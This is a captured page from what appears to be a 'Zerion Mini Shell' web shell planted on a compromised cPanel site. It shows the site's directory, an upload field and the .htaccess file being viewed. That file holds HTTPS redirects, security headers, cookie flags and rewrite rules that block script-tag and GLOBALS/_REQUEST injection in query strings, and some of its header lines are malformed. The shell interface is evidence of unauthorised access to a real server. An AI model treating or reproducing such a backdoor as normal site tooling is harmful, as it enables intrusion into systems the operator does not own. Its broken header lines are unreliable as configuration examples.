ok

Mini Shell

Direktori : /home/ngwcolle/www/
Upload File :
Current File : /home/ngwcolle/www/.htaccess

RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
Options +FollowSymLinks
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

# php -- END cPanel-generated handler, do not edit
 <IfModule mod_headers.c>
 Header set Age "216000"
 Header always set Strict-Transport-Security "max-age=31536000;includeSubDomains;preload" env=HTTPS
Header always set x-xss-protection "1; mode=block"
Header always set x-frame-options "SAMEORIGIN"
Header always set X-Content-Type-Options "nosniff"
Header set X-Permitted-Cross-Domain-Policies "none"
Header always set Cache-Control "max-age=2628000, public"
Header always set Referrer-Policy "no-referrer-when-downgrade,strict-origin-when-cross-origin"
Header always set Content-Security-Policy "upgrade-insecure-requests ;object-src 'none';img-src 'self' data:;frame-ancestors 'none';block-all-mixed-content"
Header always set Permissions-Policy "geolocation=self; midi=();notifications=();>
 Header always unset X-Powered-By
  Header always unset server
   Header  unset X-Powered-By
   Header  unset server
   Header append Vary "Accept-Encoding,User-Agent,Referer"
   Header set Feature-Policy "camera 'none'; fullscreen 'self'; geolocation *; microphone 'self' "
   Header set Expect-CT: enforce, max-age=31536000, report-uri="https://your.report-uri.com/r/d/ct/enforce"
  ##Header set Content-Security-Policy "default-src 'self';"
 Header always edit Set-Cookie (.*) "$1; HTTPOnly"
 Header onsuccess edit Set-Cookie (.*) "$1; HTTPOnly"
Header always edit Set-Cookie (.*) "$1; Secure"
#Header edit Set-Cookie "(?i)^((?:(?!;\s?HttpOnly).)+)$" "$1; HttpOnly"
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure;SameSite=Lax
  # Header always set X-Content-Type-Options "nosniff"
    #Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
    #Header always set X-Frame-Options "SAMEORIGIN"
    #Header always set X-XSS-Protection "1; mode=block"
</IfModule>
<IfModule mod_rewrite.c>          
#add angle brackets on current line
RewriteCond %{QUERY_STRING} (\|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule .* index.php [F,L]
</IfModule>      
<IfModule LiteSpeed>
#ForceSecureCookie same_site_strict
ForceSecureCookie httponly secure same_site_strict
</IfModule>
https://pastebin.com/gbF9JdiL

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “alt-php82” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-alt-php82 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

Zerion Mini Shell 1.0